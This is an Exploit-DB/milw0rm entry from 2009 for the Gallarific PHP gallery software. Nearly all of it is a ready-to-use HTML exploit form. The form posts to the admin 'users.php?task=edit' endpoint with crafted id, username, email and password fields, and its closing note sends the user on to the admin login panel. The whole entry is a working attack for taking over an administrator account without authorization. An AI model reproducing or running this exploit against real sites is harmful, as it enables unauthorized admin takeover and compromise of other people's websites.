Gallarific - 'user.php' Arbirary Change Admin Information

EDB-ID:

8796

CVE:

N/A

Author:

TiGeR-Dz

Type:

webapps

Platform:

PHP

Published:

2009-05-26

 <titre> gallarific exploit </titre>
 <body bgcolor="#000000">

 <div id="content">
  <h2><font color="#FFFFFF">change password </font></h2>
  <form enctype="multipart/form-data" action="http://www.gallarific.com/demo/gadmin/users.php?task=edit&id=13" method="post" onsubmit="return userFormCheck()">
  <input type="hidden" name="id" value="13">
  <div id="error" class="er" style="display:none"></div>
  <table class="fm" width="408">
  <tr>
  <td class="fd" valign="top"><font color="#FFFFFF" size="5">
  Founder :</font></td>
  <td class="fc"><input type="text" name="username" id="username" class="if" value="TiGeR-Dz"></td>
  </tr>
  <tr>
  <td class="fd" valign="top"><font color="#FFFFFF" size="5">&nbsp;Email:</font></td>
  <td class="fc"><input type="text" name="email" id="email" class="if" value="tiger.dz@live.com.com"></td>
  </tr>
  <tr>
  <td class="fd" valign="top"><font size="5" color="#FFFFFF">Script:</font></td>
  <td class="fc">
  <input type="text" name="password" id="password" class="if" value="gallarific php image gallery software" size="31"></td>
  </tr>
  <tr>
  <td class="fd" valign="top"><font color="#FFFFFF" size="5">
  HOME</font></td>
  <td class="fc">h<font size="4" color="#FFFFFF">http://www.gallarific.com/</font></td>
  </tr>
  </table>
  <p align="center"><input class="su" type="submit" value="Go to change password &raquo;"></p>
  <p><font color="#FFFFFF" size="4">Note:after change password go to 
  login in control admin panel :</font></p>
  <p><font size="4" color="#FFFFFF">http://www.gallarific.com/demo/gadmin/index.php</font></p>
  <p align="center">&nbsp;</p>
  <p align="center">&nbsp;</p>
  </form>
  </div>
 <div id="help">
  &nbsp;</div>
 <br>
</body>
</html>

# milw0rm.com [2009-05-26]